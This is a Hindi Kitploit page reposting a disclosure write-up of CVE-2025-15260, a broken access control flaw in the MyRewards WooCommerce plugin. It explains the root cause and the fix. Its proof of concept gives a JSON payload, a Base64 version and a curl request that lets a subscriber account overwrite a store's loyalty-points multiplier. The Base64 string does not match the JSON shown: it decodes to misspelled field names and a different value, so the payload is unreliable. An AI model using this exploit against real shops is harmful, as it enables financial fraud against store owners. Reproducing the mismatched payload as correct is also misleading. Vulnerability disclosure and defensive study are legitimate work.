Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/d3kc4rt1/cve-2025-15260
विशेषाधिकार वृद्धिभेद्यता विश्लेषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubd3kc4rt1/cve-2025-15260

CVE-2025-15260

गुम प्राधिकरण / टूटी पहुँच नियंत्रण प्लगइन - MyRewards – लॉयल्टी पॉइंट्स और रिवॉर्ड्स फॉर WooCommerce

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-15260: प्लगइन में लापता प्राधिकरण / टूटा एक्सेस नियंत्रण - MyRewards – लॉयल्टी पॉइंट्स और WooCommerce के लिए पुरस्कार

अस्वीकरण: यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों और नैतिक प्रकटीकरण के लिए बनाई गई है। इस कमजोरी की सूचना जिम्मेदारी से विक्रेता को दी गई है और इसे पैच किया जा चुका है। उचित प्राधिकरण के बिना सिस्टम का शोषण करने के लिए इस जानकारी का उपयोग न करें।

सारांश

WooCommerce के लिए MyRewards (WooRewards) प्लगइन (संस्करण <= 5.6.0) में एक गंभीर टूटा एक्सेस नियंत्रण / विशेषाधिकार वृद्धि कमजोरी पाई गई है। यह दोष किसी भी लॉग-इन उपयोगकर्ता को, यहां तक कि सब्सक्राइबर जैसे न्यूनतम विशेषाधिकार वाले को, प्राधिकरण को दरकिनार कर संवेदनशील दुकान पुरस्कार नियमों को संशोधित करने की अनुमति देता है।

इस कमजोरी का शोषण करके, एक हमलावर अपने लॉयल्टी पॉइंट्स गुणक को एक खगोलीय मान (जैसे, 999,999,999) तक बढ़ा सकता है, जिससे वे एक छोटी सी खरीद से भारी अंक जमा कर सकते हैं और उन्हें कूपन या मुफ्त उत्पादों के लिए भुना सकते हैं, जिसके परिणामस्वरूप स्टोर को सीधा वित्तीय नुकसान होता है।

कमजोरी का अवलोकन

  • CVE ID: CVE-2025-15260
  • उत्पाद: LongwayStudio द्वारा MyRewards (WooCommerce प्लगइन)
  • प्रभावित संस्करण: <= 5.6.0
  • कमजोरी का प्रकार: टूटा एक्सेस नियंत्रण / विशेषाधिकार वृद्धि (CWE-284)
  • आवश्यक विशेषाधिकार: प्रमाणित (सब्सक्राइबर या उच्च)

तकनीकी गहराई और मूल कारण

इस कमजोरी का मूल कारण डेटाबेस संशोधनों को संभालने वाले महत्वपूर्ण AJAX एंडपॉइंट्स पर क्षमता जांच या CSRF सुरक्षा को लागू करने में विफलता है।

1. अनधिकृत AJAX पंजीकरण: प्लगइन CRUD संचालन प्रबंधित करने के लिए एक सामान्य नियंत्रक वर्ग (EditlistControler) का उपयोग करता है। editlistcontroler.php में, यह wp_ajax_ हुक का उपयोग करके AJAX क्रिया editlist पंजीकृत करता है, जो इसे सभी लॉग-इन उपयोगकर्ताओं के लिए उपलब्ध कराता है, चाहे उनकी भूमिका कुछ भी हो:

root@kitploit:~
add_action('wp_ajax_lws_adminpanel_editlist', array($this, 'ajax'));

2. प्राधिकरण और नॉन्स सत्यापन का अभाव: ajax() और accept() विधियों के अंदर, कोड केवल उपयोगकर्ता इनपुट के आधार पर स्थिति-परिवर्तनशील अनुरोधों (जैसे, अद्यतन के लिए put, हटाने के लिए del) को संसाधित करता है। यह current_user_can() और check_ajax_referer() के कॉल को पूरी तरह से छोड़ देता है, जिसका अर्थ है कि यह सत्यापित नहीं किया जाता कि उपयोगकर्ता के पास manage_woocommerce अधिकार हैं या नहीं।

3. खतरनाक पेलोड प्रसंस्करण: एंडपॉइंट line पैरामीटर के माध्यम से एक Base64-एन्कोडेड JSON स्ट्रिंग स्वीकार करता है, जिसे डीकोड किया जाता है और सीधे EventList::write() विधि को भेजा जाता है, जो दुर्भावनापूर्ण सेटिंग्स को सीधे डेटाबेस में सहेजता है:

root@kitploit:~
$data = json_decode(base64_decode($line), true);
$this->m_Source->write($data);

व्यावसायिक प्रभाव

  • वित्तीय हानि: "ऑर्डर राशि" अंक गुणक में हेरफेर करके, दुर्भावनापूर्ण अभिकर्ता अनंत पुरस्कार अंक उत्पन्न कर सकते हैं और उन्हें उच्च-मूल्य वाले छूट कूपन या मुफ्त वस्तुओं के लिए विनिमय कर सकते हैं, ईकॉमर्स भुगतान गेटवे को दरकिनार करते हुए।
  • विशेषाधिकार वृद्धि: एक सामान्य ग्राहक (सब्सक्राइबर) प्लगइन प्रशासन क्रियाएं कर सकता है।
  • डेटा अखंडता से समझौता: हमलावर मौजूदा वैध पुरस्कार नियमों को विकृत, बदल या हटा सकते हैं, स्टोर के मार्केटिंग तर्क को बाधित करते हुए।

प्रूफ ऑफ कॉन्सेप्ट (PoC)

निम्नलिखित चरण दर्शाते हैं कि एक प्रमाणित सब्सक्राइबर इस दोष का शोषण कैसे कर सकता है।

1. पूर्वापेक्षाएँ

  • लक्ष्य पर WooCommerce और MyRewards v5.6.0 चल रहा हो।
  • subscriber स्तर के खाते के लिए मान्य क्रेडेंशियल।
  • एक पूर्व-कॉन्फ़िगर की गई पुरस्कार प्रणाली (जैसे, "पैसा खर्च करें" अर्जन नियम)। नोट: इस नियम का ID (जैसे, 101) अनुक्रमिक है और AJAX पोस्ट प्रतिक्रियाओं को देखकर आसानी से गणना योग्य है।

2. पेलोड

हम नियम ID 101 के अंक गुणक को 999,999,999,999,999 में अपडेट करना चाहते हैं।

प्रारंभिक JSON

root@kitploit:~
{
  "post_id":"101",
  "wre_type":"lws_woorewards_events_orderamount",
  "lws_woorewards_events_orderamount_multiplier": "999999999999999"
}

Base64 एन्कोडेड ('line' का मान)

root@kitploit:~
eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0

3. हमले को निष्पादित करें

निम्नलिखित CURL अनुरोध को निम्न-विशेषाधिकार वाले उपयोगकर्ता के रूप में चलाएं:

root@kitploit:~
curl -i -X POST 'http://TARGET_SITE/wp-admin/admin-ajax.php' \
    -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
    -b '[Subscriber_Cookies_Here]' \
    -d 'action=lws_adminpanel_editlist&method=put&id=EventList&line=eyJwb3N0X2lkIjoiMTAxIiwid3JlX3R5cGUiOiJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnQiLCJsd3Nfd29vcmV3YXJkc19ldmVudHNfb3JlZXJhbW91bnRfbWVsdGlwbGl1ciI6ICI5OTk5OTk5OTk5OTk5OTk5In0'

4. सत्यापन

  • हमलावर का दृश्य: सर्वर {"status":1} लौटाएगा जो अद्यतन की पुष्टि करता है।
  • प्रशासक का दृश्य: यदि कोई व्यवस्थापक लॉयल्टी सेटिंग्स पर जाता है, तो वे देखेंगे कि ऑर्डर के लिए अंक गुणक हमलावर द्वारा डाले गए खगोलीय मान में बदल गया है।

उपचार

इस समस्या को ठीक करने के लिए, MyRewards प्लगइन को नवीनतम पैच किए गए संस्करण में अपडेट करें। विक्रेता ने इसे निम्नलिखित तरीके से हल किया:

  1. AJAX नियंत्रक में प्रशासनिक विशेषाधिकारों को सत्यापित करने के लिए current_user_can() जांच लागू करना।
  2. नॉन्स को मान्य करने और क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) को रोकने के लिए check_ajax_referer() जोड़ना।

समयरेखा

नैतिक मानकों का पालन करने को दर्शाने के लिए प्रकटीकरण प्रक्रिया का एक संक्षिप्त लॉग:

  • तिथि (2025-12-29): Wordfence / डेवलपर को रिपोर्ट किया गया।
  • तिथि (2026-02-09): कमजोरी पैच / सार्वजनिक प्रकटीकरण।

संदर्भ और क्रेडिट

  • Wordfence भेद्यता डेटाबेस
  • NVD पर CVE-2025-15260
  • WordPress.org पर MyRewards प्लगइन
टूल डाउनलोड करें